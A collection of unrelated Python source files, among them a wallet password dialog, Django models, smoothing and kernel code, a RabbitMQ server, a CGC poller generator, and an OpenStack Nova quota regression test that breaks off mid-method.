def __init__(self, msg, kind, OK_button, wallet=None, force_disable_encrypt_cb=False):
self.wallet = wallet
self.pw = PasswordLineEdit()
self.new_pw = PasswordLineEdit()
self.conf_pw = PasswordLineEdit()
self.kind = kind
self.OK_button = OK_button
vbox = QVBoxLayout()
label = QLabel(msg + "\n")
label.setWordWrap(True)
grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnMinimumWidth(0, 150)
grid.setColumnMinimumWidth(1, 100)
grid.setColumnStretch(1,1)
if kind == PW_PASSPHRASE:
vbox.addWidget(label)
msgs = [_('Passphrase:'), _('Confirm Passphrase:')]
else:
logo_grid = QGridLayout()
logo_grid.setSpacing(8)
logo_grid.setColumnMinimumWidth(0, 70)
logo_grid.setColumnStretch(1,1)
logo = QLabel()
logo.setAlignment(Qt.AlignCenter)
logo_grid.addWidget(logo, 0, 0)
logo_grid.addWidget(label, 0, 1, 1, 2)
vbox.addLayout(logo_grid)
m1 = _('New Password:') if kind == PW_CHANGE else _('Password:')
msgs = [m1, _('Confirm Password:')]
if wallet and wallet.has_password():
grid.addWidget(QLabel(_('Current Password:')), 0, 0)
grid.addWidget(self.pw, 0, 1)
lockfile = "lock.png"
else:
lockfile = "unlock.png"
logo.setPixmap(QPixmap(icon_path(lockfile))
.scaledToWidth(36, mode=Qt.SmoothTransformation))
grid.addWidget(QLabel(msgs[0]), 1, 0)
grid.addWidget(self.new_pw, 1, 1)
grid.addWidget(QLabel(msgs[1]), 2, 0)
grid.addWidget(self.conf_pw, 2, 1)
vbox.addLayout(grid)
# Password Strength Label
if kind != PW_PASSPHRASE:
self.pw_strength = QLabel()
grid.addWidget(self.pw_strength, 3, 0, 1, 2)
self.new_pw.textChanged.connect(self.pw_changed)
self.encrypt_cb = QCheckBox(_('Encrypt wallet file'))
self.encrypt_cb.setEnabled(False)
grid.addWidget(self.encrypt_cb, 4, 0, 1, 2)
if kind == PW_PASSPHRASE:
self.encrypt_cb.setVisible(False)
def enable_OK():
ok = self.new_pw.text() == self.conf_pw.text()
OK_button.setEnabled(ok)
self.encrypt_cb.setEnabled(ok and bool(self.new_pw.text())
and not force_disable_encrypt_cb)
self.new_pw.textChanged.connect(enable_OK)
self.conf_pw.textChanged.connect(enable_OK)
self.vbox = vbox
def title(self):
return self.titles[self.kind]
def layout(self):
return self.vbox
def pw_changed(self):
password = self.new_pw.text()
if password:
colors = {"Weak":"Red", "Medium":"Blue", "Strong":"Green",
"Very Strong":"Green"}
strength = check_password_strength(password)
label = (_("Password Strength") + ": " + "<font color="
+ colors[strength] + ">" + strength + "</font>")
else:
label = ""
self.pw_strength.setText(label)
def old_password(self):
if self.kind == PW_CHANGE:
return self.pw.text() or None
return None
def new_password(self):
pw = self.new_pw.text()
# Empty passphrases are fine and returned empty.
if pw == "" and self.kind != PW_PASSPHRASE:
pw = None
return pw
def clear_password_fields(self):
for field in [self.pw, self.new_pw, self.conf_pw]:
field.clear()
class PasswordLayoutForHW(object):
def __init__(self, msg, wallet=None):
self.wallet = wallet
vbox = QVBoxLayout()
label = QLabel(msg + "\n")
label.setWordWrap(True)
grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnMinimumWidth(0, 150)
grid.setColumnMinimumWidth(1, 100)
grid.setColumnStretch(1,1)
logo_grid = QGridLayout()
logo_grid.setSpacing(8)
logo_grid.setColumnMinimumWidth(0, 70)
logo_grid.setColumnStretch(1,1)
logo = QLabel()
logo.setAlignment(Qt.AlignCenter)
logo_grid.addWidget(logo, 0, 0)
logo_grid.addWidget(label, 0, 1, 1, 2)
vbox.addLayout(logo_grid)
if wallet and wallet.has_storage_encryption():
lockfile = "lock.png"
else:
lockfile = "unlock.png"
logo.setPixmap(QPixmap(icon_path(lockfile))
.scaledToWidth(36, mode=Qt.SmoothTransformation))
vbox.addLayout(grid)
self.encrypt_cb = QCheckBox(_('Encrypt wallet file'))
grid.addWidget(self.encrypt_cb, 1, 0, 1, 2)
self.vbox = vbox
def title(self):
return _("Toggle Encryption")
def layout(self):
return self.vbox
class ChangePasswordDialogBase(WindowModalDialog):
def __init__(self, parent, wallet):
WindowModalDialog.__init__(self, parent)
is_encrypted = wallet.has_storage_encryption()
OK_button = OkButton(self)
self.create_password_layout(wallet, is_encrypted, OK_button)
self.setWindowTitle(self.playout.title())
vbox = QVBoxLayout(self)
vbox.addLayout(self.playout.layout())
vbox.addStretch(1)
vbox.addLayout(Buttons(CancelButton(self), OK_button))
self.playout.encrypt_cb.setChecked(is_encrypted)
def create_password_layout(self, wallet, is_encrypted, OK_button):
raise NotImplementedError()
class ChangePasswordDialogForSW(ChangePasswordDialogBase):
def __init__(self, parent, wallet):
ChangePasswordDialogBase.__init__(self, parent, wallet)
if not wallet.has_password():
self.playout.encrypt_cb.setChecked(True)
def create_password_layout(self, wallet, is_encrypted, OK_button):
if not wallet.has_password():
msg = _('Your wallet is not protected.')
msg += ' ' + _('Use this dialog to add a password to your wallet.')
else:
if not is_encrypted:
msg = _('Your bitcoins are password protected. However, your wallet file is not encrypted.')
else:
msg = _('Your wallet is password protected and encrypted.')
msg += ' ' + _('Use this dialog to change your password.')
self.playout = PasswordLayout(msg=msg,
kind=PW_CHANGE,
OK_button=OK_button,
wallet=wallet,
force_disable_encrypt_cb=not wallet.can_have_keystore_encryption())
def run(self):
try:
if not self.exec_():
return False, None, None, None
return True, self.playout.old_password(), self.playout.new_password(), self.playout.encrypt_cb.isChecked()
finally:
self.playout.clear_password_fields()
class ChangePasswordDialogForHW(ChangePasswordDialogBase):
def __init__(self, parent, wallet):
ChangePasswordDialogBase.__init__(self, parent, wallet)
def create_password_layout(self, wallet, is_encrypted, OK_button):
if not is_encrypted:
msg = _('Your wallet file is NOT encrypted.')
else:
msg = _('Your wallet file is encrypted.')
msg += '\n' + _('Note: If you enable this setting, you will need your hardware device to open your wallet.')
msg += '\n' + _('Use this dialog to toggle encryption.')
self.playout = PasswordLayoutForHW(msg)
def run(self):
if not self.exec_():
return False, None
return True, self.playout.encrypt_cb.isChecked()
class PasswordDialog(WindowModalDialog):
def __init__(self, parent=None, msg=None):
msg = msg or _('Please enter your password')
WindowModalDialog.__init__(self, parent, _("Enter Password"))
self.pw = pw = PasswordLineEdit()
vbox = QVBoxLayout()
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Password')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(self), OkButton(self)))
self.setLayout(vbox)
run_hook('password_dialog', pw, grid, 1)
def run(self):
try:
if not self.exec_():
return
return self.pw.text()
finally:
self.pw.clear()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-18 15:27
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import csv
import numpy as np
import matplotlib.pyplot as plt
def lookahead_moving_average(data, window):
ma = []
for i in range(len(data)):
avg = 0
if i + window > len(data):
window -= 1
for j in range(window):
avg += data[i+j]
ma.append(avg/float(window))
return np.array(ma, dtype=float)
def single_exp_smoothing(data, alpha):
S_t = data[0]
ses = []
for d in data:
S_t = alpha * d + (1 - alpha) * S_t
ses.append(S_t)
return np.array(ses, dtype=float)
def double_exp_smoothing(data, alpha, gamma):
S_t = data[0]
b_t = data[1] - data[0]
S_tt, b_tt = 0, 0
des = []
for d in data:
S_tt = alpha * d + (1 - alpha) * S_t
b_tt = gamma * (S_tt - S_t) + (1 - gamma) * b_t
S_t = S_tt
b_t = b_tt
des.append(S_tt + b_tt)
return np.array(des, dtype=float)
d = []
with open('data.csv', 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
d.append(row)
dataset = np.array(d, dtype=float)
time = dataset[:, 0]
data = dataset[:, 1]
plt.figure(1)
plt.subplot(511)
plt.title('look head moving average')
plt.plot(time, data, color='black', label='raw', lw=0.3)
ma = lookahead_moving_average(data, window=151)
plt.plot(time, data-ma, color='red', label='window=151', lw=1)
plt.ylabel('data')
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)
plt.subplot(512)
plt.title('single exponential smoothing')
colours = ['red', 'blue', 'green', 'yellow']
alphas = [0.2, 0.3, 0.5, 0.8]
plt.plot(time, data, color='black', label='raw', lw=0.3)
for i in range(len(alphas)):
ses = single_exp_smoothing(data, alpha=alphas[i])
a_label = 'alpha={}'.format(alphas[i])
plt.plot(time, data-ses, color=colours[i], label=a_label)
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)
plt.subplot(513)
plt.title('double exponential smoothing for alpha = .2')
plt.plot(time, data, color='black', label='raw', lw=0.3)
des = double_exp_smoothing(data, 0.2, 0.2)
plt.plot(time, data-des, color='blue', label='.2, .2')
des = double_exp_smoothing(data, 0.2, 0.5)
plt.plot(time, data-des, color='green', label='.2, .5')
des = double_exp_smoothing(data, 0.2, 0.8)
plt.plot(time, data-des, color='red', label='.2, .8')
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)
plt.subplot(514)
plt.title('double exponential smoothing for alpha = .5')
plt.plot(time, data, color='black', label='raw', lw=0.3)
des = double_exp_smoothing(data, 0.5, 0.2)
plt.plot(time, data-des, color='blue', label='.5, .2')
des = double_exp_smoothing(data, 0.5, 0.5)
plt.plot(time, data-des, color='green', label='.5, .5')
des = double_exp_smoothing(data, 0.5, 0.8)
plt.plot(time, data-des, color='red', label='.5, .8')
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)
plt.subplot(515)
plt.title('double exponential smoothing for alpha = .8')
plt.plot(time, data, color='black', label='raw', lw=0.3)
des = double_exp_smoothing(data, 0.8, 0.2)
plt.plot(time, data-des, color='blue', label='.8, .2')
des = double_exp_smoothing(data, 0.8, 0.5)
plt.plot(time, data-des, color='green', label='.8, .5')
des = double_exp_smoothing(data, 0.8, 0.8)
plt.plot(time, data-des, color='red', label='.8, .5')
plt.legend(bbox_to_anchor=(1.005, 1), loc=2, borderaxespad=0.)
plt.show()
|
from django.db import models
from django.template.defaultfilters import slugify
from model_utils.models import TimeStampedModel
from experiments_manager.models import ChosenExperimentSteps
class ExperimentMeasure(models.Model):
name = models.CharField(max_length=255, editable=False)
description = models.TextField()
high_message = models.CharField(max_length=255, default='High')
medium_message = models.CharField(max_length=255, default='Medium')
low_message = models.CharField(max_length=255, default='Low')
def __str__(self):
return 'Measurement of {0}'.format(self.name)
def get_low_message(self):
return '{0}: {1}'.format(self.name, self.low_message)
def get_medium_message(self):
return '{0}: {1}'.format(self.name, self.medium_message)
def get_high_message(self):
return '{0}: {1}'.format(self.name, self.high_message)
def slug(self):
return slugify(self.name).replace('-', '_')
class RawMeasureResult(models.Model):
key = models.CharField(max_length=255)
value = models.CharField(max_length=1000)
def __str__(self):
return 'Key: {0} with value: {1}'.format(self.key, str(self.value))
class ExperimentMeasureResult(TimeStampedModel):
HIGH = 'H'
MEDIUM = 'M'
LOW = 'L'
SCALE = (
(HIGH, 'High'),
(MEDIUM, 'Medium'),
(LOW, 'Low'),
)
step = models.ForeignKey(to=ChosenExperimentSteps)
measurement = models.ForeignKey(to=ExperimentMeasure)
result = models.CharField(max_length=1, choices=SCALE)
raw_values = models.ManyToManyField(to=RawMeasureResult)
def get_message(self):
message_dict = {ExperimentMeasureResult.LOW: self.measurement.get_low_message(),
ExperimentMeasureResult.MEDIUM: self.measurement.get_medium_message(),
ExperimentMeasureResult.HIGH: self.measurement.get_high_message()}
if self.result:
return message_dict[self.result]
return 'Result missing'
def get_class(self):
style_classes = {ExperimentMeasureResult.LOW: 'danger',
ExperimentMeasureResult.MEDIUM: 'warning',
ExperimentMeasureResult.HIGH: 'success'}
if not self.result:
return "default"
return style_classes[self.result]
def slug(self):
return self.measurement.slug()
def __str__(self):
return "Workbench scan of {0}".format(self.measurement.name)
|
import numpy as np
from scipy.spatial.distance import pdist
class Fourier:
def __init__(self, X, k=60000, sigma=None):
self.X = X
self.k = k
self.N = X.shape[0]
self.d = k
if sigma is None:
sample_size = min(self.N, max(1000, int(X.shape[0]/10)))
self.set_sigma(sample_size)
else:
self.sigma = sigma
self.generate_feature_vectors()
pass
def set_sigma(self, sample_size):
# About 2000 is good.
print('determine kernel bandwidth using {} points.'.format(sample_size))
X_sample_indices = np.random.choice(self.N, sample_size, replace=False)
X_sample = self.X[X_sample_indices]
assert X_sample is not None
pairwise_distances = pdist(X_sample)
# TODO: try mean instead of median.
median_dist = np.median(pairwise_distances)
print("median distance for {} samples from N: {}".format(
sample_size, median_dist))
self.sigma = median_dist
def generate_feature_vectors(self):
"""
independently sample every coordinate for every vector from a
standard normal distribution (with unit variance).
"""
n = self.X.shape[1]
self.vectors = np.random.randn(n, self.k)
def transform(self, X):
#dot_prod = X.dot(self.vectors)
#return np.exp(dot_prod/self.sigma)
return np.sin(np.dot(X, self.vectors)/self.sigma)
def info(self):
return {'sigma':[self.sigma]}
class RBFKernel:
def __init__(self, X, sigma=None):
self.X = X
self.N = X.shape[0]
self.d = X.shape[0] # N by d --> N by N
if sigma is None:
sample_size = min(self.N, max(1000, int(X.shape[0]/10)))
self.set_sigma(sample_size)
else:
self.sigma = sigma
self.name = 'radial basis function'
def set_sigma(self, sample_size):
"""
setting σ is often done with the ’median trick’, which is the median
of the pairwise distances (between the x’s) in your dataset.
Randomly grab a few pairs of points and estimate the mean distance
between a random pair of points rather than the median).
Then multiplicatively cut it down by some factor (maybe 2, 4, 8, ...
depending on the problem).
:param sample_size: number of samples to chose the median based on
:return:
"""
print('determine RBF kernel bandwidth using {} points.'.format(
sample_size))
X_sample_indices = np.random.choice(self.N, sample_size, replace=False)
X_sample = self.X[X_sample_indices]
assert X_sample is not None
pairwise_distances = pdist(X_sample)
# TODO: try mean instead of median.
median_dist = np.median(pairwise_distances)
print("median distance for {} samples from N: {}".format(
sample_size, median_dist))
self.sigma = median_dist
def transform_vector(self, xi):
"""
transforms a single point
"""
dist = np.linalg.norm(self.X - xi, axis=1)
dist_squared = np.multiply(dist, dist)
return np.exp(dist_squared/(-2.)/self.sigma**2)
def transform(self, X):
"""
Transforms a matrix, which isn't necessarily self.X
"""
# TODO: could apply only to the first 1/2 of point (I think)
return np.apply_along_axis(func1d=self.transform_vector, axis=1, arr=X)
def info(self):
return {'sigma':[self.sigma]}
class NoKernel:
def __init__(self, X):
self.X = X
self.N, self.d = X.shape
def transform(self, X):
# The point of this kernel is to not transform anything at all.
return X
def info(self):
return {"null kernel":[None]}
|
#!/usr/bin/env python
import logging
import sys
from os import environ
from time import sleep
import json
from uuid import uuid4
from celery import Celery
import pika
def init_logging():
logger = logging.getLogger('server')
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
formatter = logging.Formatter('[%(levelname)s] - [%(asctime)s] - %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
return logger
def init_celery():
redis = environ.get('REDIS_HOST', 'localhost')
app = Celery('server', broker='redis://{}:6379/2'.format(redis), backend='redis://{}:6379/3'.format(redis))
@app.task
def data():
connection = mq_connection()
channel = connection.channel()
channel.exchange_declare(exchange='logs', type='fanout')
message = json.dumps({'data': {'uuid': str(uuid4()), 'message': 'Payload incoming', 'type': 'data'}})
channel.basic_publish(exchange='logs', routing_key='', body=message)
logger.info("[x] Sent {0}".format(message))
return app
logger = init_logging()
celery = init_celery()
def mq_connection(blocking=True):
credentials = pika.PlainCredentials(environ.get('RABBITMQ_USER', 'rabbit'), environ.get('RABBITMQ_PASS', 'rabbit'))
ssl_opts = {'ca_certs': '/tmp/ca/cacert.pem', 'certfile': '/tmp/client/cert.pem', 'keyfile': '/tmp/client/key.pem'}
if blocking:
return pika.BlockingConnection(pika.ConnectionParameters(
host=environ.get('RABBITMQ_HOST', 'localhost'), port=5671, credentials=credentials, ssl=True, ssl_options=ssl_opts)
)
else:
raise Exception('Only blocking is supported right now')
def registrator():
logger.info(' [*] Waiting for clients. To exit press CTRL+C')
connection = mq_connection()
channel = connection.channel()
channel.exchange_declare(exchange='registrator', type='fanout')
result = channel.queue_declare()
queue_name = result.method.queue
channel.queue_bind(exchange='registrator', queue=queue_name)
def callback(ch, method, properties, body):
if json.loads(body).get('type') == 'registration':
logger.info('Registered client {}'.format(json.loads(body).get('client')))
elif json.loads(body).get('type') == 'heartbeat':
logger.info('Client {} alive'.format(json.loads(body).get('client')))
else:
logger.warning('Unknown message')
channel.basic_consume(callback, queue=queue_name, no_ack=True)
channel.start_consuming()
def run():
connection = mq_connection()
channel = connection.channel()
channel.exchange_declare(exchange='logs',
type='fanout')
for i in range(10000):
message = json.dumps({'message': "Here's the server, over!"})
channel.basic_publish(exchange='logs',
routing_key='',
body=message)
logger.info("[x] Sent {0} #{1}".format(message, i))
sleep(15)
connection.close()
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1:][0] == 'registrator':
registrator()
else:
run()
|
import struct
import time
import sys
import random
import string
def randString( z ):
s = ''
for i in range(z):
s += random.choice( string.lowercase + string.uppercase + string.digits)
return s
def delfile( dirs ):
### randomly select a directory then pull the file to remove
fl = ''
cnt = 0
while fl == '' and cnt < 30:
z = random.choice(dirs)
cnt += 1
if len(z[1]) == 0:
continue
f = random.choice(z[1])
i = z[1].index(f)
del z[1][i]
fl = f[0]
if fl == '':
return ''
data = '\t\t<write echo="ascii"><data>REPO\\x%.2x%s</data></write>\n' %(len(fl), fl)
i = fl.rfind('/')
fl = fl[i+1:]
data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] %s removed\\n</data></match></read>\n' %(fl)
return data
def addfile( dirs ):
### Select a base dir to add the file
td = random.choice( dirs )
base_dir = td[0]
maxlen = 10
if (254 - len(base_dir)) < 10:
return ''
n = randString( random.randint(4, 10) )
newfile = base_dir + '/' + n
fdata = randString( random.randint(20,100) )
z = 'SEND\\x%.2x%s' %(len(newfile), newfile)
z += '\\x%.2x\\x%.2x%s' %( len(fdata)&0xff, (len(fdata)>>8)&0xff, fdata )
data = '\t\t<write echo="ascii"><data>%s</data></write>\n' %(z)
data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] File received: %s\\n</data></match></read>\n' %(newfile)
td[1].append( [newfile, fdata] )
return data
def getFile( dirs ):
### Select a base dir with a file
t = []
cnt = 0
while t == [] and cnt < 30:
z = random.choice( dirs )
if len(z[1]) != 1:
t = z[1]
break
cnt += 1
if t == []:
return ''
fl = random.choice(t)
req = 'RECV\\x%.2x%s' %( len(fl[0]), fl[0] )
data = '\t\t<write echo="ascii"><data>%s</data></write>\n' %(req)
data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[DATA] %s\\n</data></match></read>\n' %(fl[1])
return data
def addDir( dirs ):
### Select a base dir to add
td = random.choice( dirs )
base_dir = td[0]
maxlen = 10
if (254 - len(base_dir)) < 10:
return ''
n = randString( random.randint(4, 10) )
newdir = base_dir + '/' + n
z = 'NDIR\\x%.2x%s' %(len(newdir), newdir)
data = '\t\t<write echo="ascii"><data>' + z + '</data></write>\n'
data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] Added new directory\\n</data></match></read>\n'
dirs.append( [ newdir, [] ] )
return data
def addPrint( dirs ):
c = []
for x in dirs:
for y in x[1]:
c.append( [ y[0], 'File', str(len(y[1]))] )
if x[0] == '':
continue
c.append( [x[0], 'Dir', '' ])
c.sort(key=lambda x: x[0])
data = '\t\t<write echo="ascii"><data>PRNT</data></write>\n'
data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] Listing files\\n</data></match></read>\n'
for y in c:
if y[1] == 'File':
l = ' ' + y[2]
else:
l = ''
data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>%s %s%s\\n</data></match></read>\n' %(y[0], y[1], l)
return data
def addStop():
data = '\t\t<write echo="ascii"><data>STOP</data></write>\n'
data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] Terminating\\n</data></match></read>\n'
return data
def newpoll( ind ):
dir_structure = [ ['', [] ] ]
data = '<?xml version="1.0" standalone="no" ?>\n'
data += '<!DOCTYPE pov SYSTEM "/usr/share/cgc-replay/replay.dtd">\n'
data += '<pov>\n'
data += '\t<cbid>CROMU_00033</cbid>\n'
data += '\t<replay>\n'
flist = [addDir, addfile, getFile]
repo = 0
for i in range(0, random.randint(105, 200)):
if i == 100:
flist.append(delfile)
b = random.choice( flist )
if b == delfile:
repo = 1
data += b( dir_structure )
### Only add this in if a file has been not been deleted
if repo == 0:
data += addPrint( dir_structure )
data += addStop()
data += '\t</replay>\n'
data += '</pov>\n'
f = open("./poller/for-testing/POLL%.5d.xml" %(ind), "wb")
f.write(data)
f.close()
if __name__ == '__main__':
seed = time.time()
if len(sys.argv) == 2:
seed = int(sys.argv[1])
random.seed(seed)
for i in range(1, 1000):
newpoll(i)
|
from golem.core.deferred import sync_wait
from golem.interface.command import group, Argument, command, CommandResult
@group(name="envs", help="Manage environments")
class Environments(object):
name = Argument('name', help="Environment name")
table_headers = ['name', 'supported', 'active', 'performance',
'description']
sort = Argument(
'--sort',
choices=table_headers,
optional=True,
default=None,
help="Sort environments"
)
@command(argument=sort, help="Show environments")
def show(self, sort):
deferred = Environments.client.get_environments()
result = sync_wait(deferred) or []
values = []
for env in result:
values.append([
env['id'],
str(env['supported']),
str(env['accepted']),
str(env['performance']),
env['description']
])
return CommandResult.to_tabular(Environments.table_headers, values,
sort=sort)
@command(argument=name, help="Enable environment")
def enable(self, name):
deferred = Environments.client.enable_environment(name)
return sync_wait(deferred)
@command(argument=name, help="Disable environment")
def disable(self, name):
deferred = Environments.client.disable_environment(name)
return sync_wait(deferred)
@command(argument=name, help="Recount performance for an environment")
def recount(self, name):
deferred = Environments.client.run_benchmark(name)
return sync_wait(deferred, timeout=1800)
|
from __future__ import division
import Tkinter
import preset
from engine2d import Engine2D
from engine3d import Engine3D
from util import *
simulator = None
keymap = {
u'\uf700': 'up',
u'\uf701': 'down',
u'\uf702': 'left',
u'\uf703': 'right',
'z': 'zoom_in',
'x': 'zoom_out',
'w': 'rotate_up',
's': 'rotate_down',
'a': 'rotate_left',
'd': 'rotate_right'
}
class Map(dict):
def __getattr__(self, attr):
return self.get(attr)
class Simulator:
def __init__(self, preset):
global config
config = Map(preset({}))
self.tk = Tkinter.Tk()
self.tk.title(config.TITLE)
self.canvas = Tkinter.Canvas(self.tk, bg=config.BACKGROUND, width=config.W, height=config.H)
self.engine = (Engine2D if config.DIMENSION == 2 else Engine3D)(config, self.canvas, on_key_press)
self.tk.bind("<Key>", on_key_press)
self.canvas.bind("<Button-1>", on_click)
self.canvas.pack()
def animate(self):
self.engine.animate()
def on_click(event):
engine = simulator.engine
x = event.x
y = event.y
if not engine.animating:
for obj in engine.objs:
c = engine.object_coords(obj)
cx = (c[0] + c[2]) / 2
cy = (c[1] + c[3]) / 2
r = (c[2] - c[0]) / 2
if get_distance(cx, cy, x, y) < r:
obj.show_controlbox()
return
engine.create_object(event.x, event.y)
def on_key_press(event):
engine = simulator.engine
char = event.char
if char == ' ':
engine.destroy_controlboxes()
engine.animating = not engine.animating
simulator.tk.title("%s (%s)" % (config.TITLE, "Simulating" if engine.animating else "Paused"))
elif char in keymap and hasattr(engine.camera, keymap[char]):
getattr(engine.camera, keymap[char])(char)
def main():
global simulator
simulator = Simulator(preset.DEFAULT)
simulator.animate()
Tkinter.mainloop()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
MoEDAL and CERN@school - ANN -> ORI.
See the README.md file and the GitHub wiki for more information.
http://cernatschool.web.cern.ch
"""
# Import the code needed to manage files.
import os, glob
#...for parsing the arguments.
import argparse
#...for the logging.
import logging as lg
#...for handling the annotation JSON information.
import json
# The annotation file wrapper class.
from wrappers.ann import ANN
if __name__ == "__main__":
print("*")
print("*====================================*")
print("* MoEDAL and CERN@school: ANN -> ORI *")
print("*====================================*")
print("*")
# Get the datafile path from the command line.
parser = argparse.ArgumentParser()
parser.add_argument("dataPath", help="Path to the input dataset.")
parser.add_argument("-v", "--verbose", help="Increase output verbosity", action="store_true")
args = parser.parse_args()
## The root data path.
data_path = args.dataPath
# Check if the input file exists. If it doesn't, quit.
if not os.path.exists(data_path):
raise IOError("* ERROR: '%s' input file does not exist!" % (data_path))
## The annotations path.
ann_path = os.path.join(data_path, "ANN")
if not os.path.isdir(ann_path):
raise IOError("* ERROR: '%s' does not exist - no annotation data!" % (ann_path))
## The outer ring information data path.
ori_path = os.path.join(data_path, "ORI")
if not os.path.isdir(ori_path):
os.mkdir(ori_path)
# Set the logging level.
if args.verbose:
level=lg.DEBUG
else:
level=lg.INFO
# Configure the logging.
lg.basicConfig(filename=os.path.join('./.', 'log_ann_to_ori.log'), filemode='w', level=level)
lg.info(" *")
lg.info(" *====================================*")
lg.info(" * MoEDAL and CERN@school: ANN -> ORI *")
lg.info(" *====================================*")
lg.info(" *")
lg.info(" * Looking for annotations in : '%s'" % (ann_path))
lg.info(" * Writing outer ring information in : '%s'" % (ori_path))
lg.info(" *")
# Loop over the found annotations.
for i, ann_csv_path in enumerate(sorted(glob.glob(os.path.join(ann_path, "*.csv")))):
## The subject ID.
sub_id = os.path.basename(ann_csv_path)[:-4]
## The annotations found for the subject.
annotations = ANN(ann_csv_path)
outer_ring_list = []
# Loop over the annotations found in the subject.
for anno_id, anno in annotations.get_annotations().iteritems():
## The annotation data
d = json.loads(anno)
# Loop over the task answers for this annotation.
for entry in d:
if entry["task"] == "T0":
# Get the outer ring information from the annotation.
outer_ring_info = entry["value"]
# Add an outer ring for each found.
for outer_ring_i in outer_ring_info:
x = outer_ring_i["x"]
y = outer_ring_i["y"]
r = outer_ring_i["r"]
outer_ring_list.append("%s,%.1f,%.1f,%.1f" % (anno_id,x,y,r))
# Write out the ORI CSV file.
## The ORI CSV filename (and path).
ori_csv_path = os.path.join(ori_path, "%s.csv" % (sub_id))
#
## The CSV file string to write out.
ori_csv_s = "annotation_id,x,y,r\n"
#
# Loop over the outer rings.
for i, outer_ring_string in enumerate(outer_ring_list):
ori_csv_s += outer_ring_string
if i < len(outer_ring_list): ori_csv_s += "\n"
#
# Write out the CSV file.
with open(ori_csv_path, "w") as nf:
nf.write(ori_csv_s)
lg.info(" * Subject '%s' found in '%s': % 6d annotations." % (sub_id, ann_csv_path, annotations.get_number_of_annotations()))
print("* Converted '%s' -> '%s' (%d annotations)." % (ann_csv_path, ori_csv_path, annotations.get_number_of_annotations()))
lg.info(" *")
print("*")
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nova import test
from nova.tests import fixtures as nova_fixtures
from nova.tests.functional import integrated_helpers
from nova.tests.unit.image import fake as fake_image
from nova.tests.unit import policy_fixture
class TestMultiCreateServerGroupMemberOverQuota(
test.TestCase, integrated_helpers.InstanceHelperMixin):
"""This tests a regression introduced in the Pike release.
Starting in the Pike release, quotas are no longer tracked using usages
and reservations tables but instead perform a resource counting operation
at the point of resource creation.
When creating multiple servers in the same request that belong in the same
server group, the [quota]/server_group_members config option is checked
to determine if those servers can belong in the same group based on quota.
However, the quota check for server_group_members only counts existing
group members based on live instances in the cell database(s). But the
actual instance record isn't created in the cell database until *after* the
server_group_members quota check happens. Because of this, it is possible
to bypass the server_group_members quota check when creating multiple
servers in the same request.
"""
def setUp(self):
super(TestMultiCreateServerGroupMemberOverQuota, self).setUp()
self.flags(server_group_members=2, group='quota')
self.useFixture(policy_fixture.RealPolicyFixture())
self.useFixture(nova_fixtures.NeutronFixture(self))
self.useFixture(nova_fixtures.PlacementFixture())
api_fixture = self.useFixture(nova_fixtures.OSAPIFixture(
api_version='v2.1'))
self.api = api_fixture.api
self.api.microversion = '2.37' # so we can specify networks='none'
fake_image.stub_out_image_service(self)
self.addCleanup(fake_image.FakeImageService_reset)
group = {'name': 'test group', 'policies': ['soft-anti-affinity']}
self.created_group = self.api.post_server_groups(group)
def test_multi_create_server_group_members_over_quota(self):
"""Recreate scenario for the bug where we create an anti-affinity
server group and then create 3 servers in the group using a
multi-create POST /servers request.
"""
server_req = self._build_minimal_create_server_request(
self.api, 'test_multi_create_server_group_members_over_quota',
image_uuid=fake_image.AUTO_DISK_CONFIG_ENABLED_IMAGE_UUID,
networks='none')
server_req['min_count'] = 3
server_req['return_reservation_id'] = True
hints = {'group': self.created_group['id']}
# We should get a 403 response due to going over quota on server
# group members in a single request.
self.api.api_post(
'/servers', {'server': server_req, 'os:scheduler_hints': hints},
check_response_status=[403])
group = self.api.api_get(
'/os-server-groups/%s' %
self.created_group['id']).body['server_group']
self.assertEqual(0, len(group['members']))
def test_concurrent_request_server_group_members_over_quota(self):
"""Recreate scenario for the bug where we create 3 servers in the
same group but in separate requests. The NoopConductorFixture is used
to ensure the instances are not created in the nova cell database which
means the quota check will have to rely on counting group members using
build requests from the API DB.
"""
# These aren't really concurrent requests, but we can simulate that
